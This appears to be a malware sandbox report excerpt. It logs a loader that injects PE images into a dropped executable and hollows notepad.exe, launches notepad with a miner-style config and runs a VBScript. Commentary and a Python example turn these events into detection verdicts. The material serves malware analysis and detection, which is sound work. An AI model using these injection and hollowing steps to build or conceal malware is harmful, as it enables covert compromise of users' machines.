                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory allocated: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe base: 1460000 protect: page execute and read and write
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory allocated: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe base: 3A0000 protect: page read and write
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory allocated: C:\Windows\notepad.exe base: 400000 protect: page read and write
                        Creates a thread in another existing process (thread injection)
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Thread created: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe EIP: 1468390
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Memory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory written: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe base: 1460000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory written: C:\Windows\notepad.exe base: 400000 value starts with: 4D5A
                        Modifies the context of a thread in another process (thread injection)
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Thread register set: target process: 5064
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Memory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 400000
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Memory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 401000
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Memory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 409000
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Memory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 40C000
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Memory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 5D3000
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Memory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 1191008
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory written: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe base: 1460000
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory written: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe base: 3A0000
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory written: C:\Windows\notepad.exe base: 400000
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory written: C:\Windows\notepad.exe base: 401000
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory written: C:\Windows\notepad.exe base: 938000
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory written: C:\Windows\notepad.exe base: A15000
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Memory written: C:\Windows\notepad.exe base: 2915411010
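                        Read together, the allocation, write, thread and context events above describe two different injection techniques from the same loader: an RWX allocation in oQOWFbKllEKo.exe that receives an MZ header and then a new thread whose EIP (1468390) lies 0x8390 bytes into that image, and a write of an MZ header at notepad.exe's image base (400000) followed by a thread-context change, which is the classic hollowing pattern that explains why notepad.exe later talks Stratum to the pool. The Python below is an added example of correlating such per-pair events into a technique verdict; it is not part of the report and not Joe Sandbox code. The event tuples are constructed from the lines above; the one assumption, marked in the code, is that the "target process: 5064" context change belongs to notepad.exe.

```python
import re
from collections import defaultdict

# Process paths taken from the report lines above.
DESKTOP = r"C:\Users\user\Desktop\4rC1bQcnl5.exe"
LOADER = r"C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe"
DROPPED = (r"C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB"
           r"\oQOWFbKllEKo.exe")
NOTEPAD = r"C:\Windows\notepad.exe"

# Constructed event list, modelled on the report's behaviour lines as
# (source, action, target, detail). Addresses are the ones shown above; the tuple
# layout is this example's own. ASSUMPTION: the "Thread register set: target
# process: 5064" line is attributed to notepad.exe, the process that also
# receives an MZ header at its image base.
SAMPLE_EVENTS = [
    (DESKTOP, "Memory written", LOADER, "base: 400000 value starts with: 4D5A"),
    (LOADER, "Memory allocated", DROPPED, "base: 1460000 protect: page execute and read and write"),
    (LOADER, "Memory written", DROPPED, "base: 1460000 value starts with: 4D5A"),
    (LOADER, "Thread created", DROPPED, "EIP: 1468390"),
    (LOADER, "Memory allocated", NOTEPAD, "base: 400000 protect: page read and write"),
    (LOADER, "Memory written", NOTEPAD, "base: 400000 value starts with: 4D5A"),
    (LOADER, "Thread register set", NOTEPAD, "target process: 5064"),
    (LOADER, "Memory allocated", LOADER, "base: 1CE0000 protect: page read and write"),  # self, ignored
]

_HEX = re.compile(r"(?:base|EIP): ([0-9A-Fa-f]+)")


def _addr(detail: str):
    """Return the hex address carried in a detail string, or None."""
    m = _HEX.search(detail)
    return int(m.group(1), 16) if m else None


def analyse_injection(events):
    """Correlate events per (source, target) pair and name the injection technique observed."""
    pairs = defaultdict(lambda: {"rwx": False, "pe_base": None, "eip": None, "ctx": False})
    for src, action, target, detail in events:
        if src == target:
            continue  # writes to the process's own address space are not injection
        rec = pairs[(src, target)]
        if action == "Memory allocated" and "execute" in detail:
            rec["rwx"] = True
        elif action == "Memory written" and "value starts with: 4D5A" in detail:
            rec["pe_base"] = _addr(detail)          # an MZ header landed in the target
        elif action == "Thread created":
            rec["eip"] = _addr(detail)              # execution trigger: CreateRemoteThread-style
        elif action == "Thread register set":
            rec["ctx"] = True                       # execution trigger: SetThreadContext-style

    verdicts = {}
    for pair, rec in pairs.items():
        tags = []
        if rec["pe_base"] is not None and rec["eip"] is not None:
            tags.append("remote-thread PE injection")
            if rec["eip"] >= rec["pe_base"]:
                tags.append(f"entry point inside injected image (+0x{rec['eip'] - rec['pe_base']:X})")
        if rec["pe_base"] is not None and rec["ctx"]:
            tags.append("process hollowing (PE written, thread context set)")
        if rec["pe_base"] is not None and not tags:
            tags.append("PE image written, execution trigger not observed")
        if rec["rwx"]:
            tags.append("RWX allocation in foreign process")
        if tags:
            verdicts[pair] = tags
    return verdicts


if __name__ == "__main__":
    for (src, dst), tags in analyse_injection(SAMPLE_EVENTS).items():
        print(f"{src} -> {dst}: {', '.join(tags)}")
```

                        The Desktop-to-Temp pair shows why the "trigger not observed" branch matters: the sandbox records an MZ header written at 400000 but no thread event for it, so a rule that requires both would miss the first hop even though the Temp copy clearly executes afterwards. Keying on the PE header write alone, and treating the thread event as an upgrade of confidence, keeps both hops.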
                        Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe Code function: 17_2_014680E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,Process32Next,CloseHandle,FreeLibrary, explorer.exe
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Process created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Process created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Process created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.497482317.0000000001CE0000.00000002.00000001.sdmp, oQOWFbKllEKo.exe, 00000011.00000002.495774560.0000000001860000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.497482317.0000000001CE0000.00000002.00000001.sdmp, oQOWFbKllEKo.exe, 00000011.00000002.495774560.0000000001860000.00000002.00000001.sdmp Binary or memory string: Progman
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.497482317.0000000001CE0000.00000002.00000001.sdmp, oQOWFbKllEKo.exe, 00000011.00000002.495774560.0000000001860000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.497482317.0000000001CE0000.00000002.00000001.sdmp, oQOWFbKllEKo.exe, 00000011.00000002.495774560.0000000001860000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.497482317.0000000001CE0000.00000002.00000001.sdmp, oQOWFbKllEKo.exe, 00000011.00000002.495774560.0000000001860000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Users\user\Desktop\4rC1bQcnl5.exe VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
